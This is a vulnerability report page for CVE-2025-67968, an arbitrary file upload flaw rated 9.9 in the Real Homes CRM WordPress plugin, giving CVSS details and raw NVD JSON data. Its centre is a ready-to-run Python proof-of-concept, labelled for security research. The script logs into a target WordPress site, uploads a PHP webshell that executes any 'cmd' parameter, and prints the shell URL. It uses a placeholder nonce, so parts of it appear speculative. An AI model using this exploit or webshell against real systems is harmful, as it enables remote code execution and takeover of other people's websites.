Security Vulnerability Report
中文
CVE-2025-67968 CVSS 9.9 CRITICAL

CVE-2025-67968

Published: 2026-01-22 17:16:06
Last Modified: 2026-04-15 00:35:42

Description

Unrestricted Upload of File with Dangerous Type vulnerability in InspiryThemes Real Homes CRM realhomes-crm allows Using Malicious Files.This issue affects Real Homes CRM: from n/a through <= 1.0.0.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Real Homes CRM <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67968 PoC - Real Homes CRM Arbitrary File Upload # Target: WordPress site with Real Homes CRM plugin <= 1.0.0 def upload_shell(target_url, username, password): """ Upload a PHP webshell to target server """ # Login to WordPress login_url = target_url + '/wp-login.php' session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data) # Check if login successful if 'wordpress_logged_in' not in str(session.cookies): print('[-] Login failed') return None print('[+] Login successful') # Upload malicious file upload_url = target_url + '/wp-admin/admin-ajax.php' # PHP webshell content php_shell = '<?php if(isset($_REQUEST["cmd"])){ system($_REQUEST["cmd"]); } ?>' files = { 'file': ('shell.php', php_shell, 'application/x-php') } data = { 'action': 'realhomes_upload_file', 'nonce': 'attacker_controlled_or_bruteforced' } try: resp = session.post(upload_url, files=files, data=data, timeout=10) # Parse response to get uploaded file path if resp.status_code == 200: print('[+] File uploaded successfully') print('[+] Access shell at: ' + target_url + '/wp-content/uploads/realhomes/shell.php?cmd=whoami') return True else: print('[-] Upload failed') return False except Exception as e: print(f'[-] Error: {str(e)}') return False if __name__ == '__main__': if len(sys.argv) < 4: print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] upload_shell(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67968", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:06.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in InspiryThemes Real Homes CRM realhomes-crm allows Using Malicious Files.This issue affects Real Homes CRM: from n/a through <= 1.0.0."}, {"lang": "es", "value": "Una vulnerabilidad de carga sin restricciones de archivo con tipo peligroso en InspiryThemes Real Homes CRM realhomes-crm permite el uso de archivos maliciosos. Este problema afecta a Real Homes CRM: desde n/a hasta &lt;= 1.0.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/realhomes-crm/vulnerability/wordpress-real-homes-crm-plugin-1-0-0-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}